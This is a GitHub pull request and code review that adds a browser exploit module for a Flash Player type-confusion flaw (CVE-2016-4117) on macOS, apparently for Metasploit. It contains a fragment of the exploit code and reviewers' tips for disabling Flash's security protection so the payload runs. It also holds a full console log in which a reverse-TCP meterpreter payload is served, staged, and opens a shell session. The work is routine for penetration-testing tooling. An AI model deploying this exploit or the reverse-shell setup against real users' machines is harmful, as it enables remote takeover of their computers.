### PR TITLE
Add Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion (CVE-2016-4117) exploit targeting macOS

### PR DESCRIPTION
**Pull request by busterb**
WIP, still testing and working on docs.

## Verification

Coming soon...

### CODE REVIEW

**Comment by busterb** [comment]
Thanks for the quick review @bcoles

File: modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb [hunk 1]
```diff
@@ -0,0 +1,127 @@
...
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(3..7)}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+
+    if target.name.include 'osx'
```
Comment (bcoles) [inline modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb]:
```suggestion
    if target.name.include? 'osx'
```

**Comment by timwr** [comment]
Any idea how to get rid of the "Flash out-of-date" box (when you increase the width/height)? It blocks the swf from running. I tried setting the date back too.

**Comment by timwr** [comment]
Oh you can do Preferences > Websites > Adobe Flash Player
If I un-check "Enable Security Protection" then it works, but the session (shell/meterpreter) dies straight away.
If I then un-check "Run in Safe Mode" the session seems to work.

**Comment by timwr** [comment]
```
[*] Processing adobe.rc for ERB directives.
resource (adobe.rc)> use exploit/osx/browser/adobe_flash_delete_range_tl_op
resource (adobe.rc)> set payload osx/x64/meterpreter/reverse_tcp
payload => osx/x64/meterpreter/reverse_tcp
resource (adobe.rc)> set LHOST 192.168.43.176
LHOST => 192.168.43.176
resource (adobe.rc)> set URIPATH /
URIPATH => /
resource (adobe.rc)> exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.43.176:4444
msf5 exploit(osx/browser/adobe_flash_delete_range_tl_op) > ;[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.43.176:8080/
[*] Server started.

[-] Unknown command: ;.
msf5 exploit(osx/browser/adobe_flash_delete_range_tl_op) >
msf5 exploit(osx/browser/adobe_flash_delete_range_tl_op) >
msf5 exploit(osx/browser/adobe_flash_delete_range_tl_op) >
[*] 192.168.43.176   adobe_flash_delete_range_tl_op - Gathering target information for 192.168.43.176
[*] 192.168.43.176   adobe_flash_delete_range_tl_op - Sending HTML response to 192.168.43.176
[-] 192.168.43.176   adobe_flash_delete_range_tl_op - Target 192.168.43.176 has requested an unknown path: /favicon.ico
[-] 192.168.43.176   adobe_flash_delete_range_tl_op - Target 192.168.43.176 has requested an unknown path: /apple-touch-icon-precomposed.png
[-] 192.168.43.176   adobe_flash_delete_range_tl_op - Target 192.168.43.176 has requested an unknown path: /apple-touch-icon.png
[*] 192.168.43.176   adobe_flash_delete_range_tl_op - Request: /akZscB/
[*] 192.168.43.176   adobe_flash_delete_range_tl_op - Sending HTML...
[*] 192.168.43.176   adobe_flash_delete_range_tl_op - Request: /akZscB/GNKI.swf
[*] 192.168.43.176   adobe_flash_delete_range_tl_op - Sending SWF...
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (808376 bytes) to 192.168.43.176
[*] Meterpreter session 1 opened (192.168.43.176:4444 -> 192.168.43.176:57398) at 2019-02-09 18:55:04 +0800

msf5 exploit(osx/browser/adobe_flash_delete_range_tl_op) > sessions 1
[*] Starting interaction with 1...

meterpreter > pwd
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.64.xpc
meterpreter > getuid
Server username: uid=501, gid=20, euid=501, egid=20
```

**Comment by pbarry-r7** [comment]
## Release Notes

This new module exploits type confusion with the DeleteRangeTimelineOperation class in vulnerable versions of Adobe Flash Player for macOS targets, leading to remote code execution.

**Pull request merged**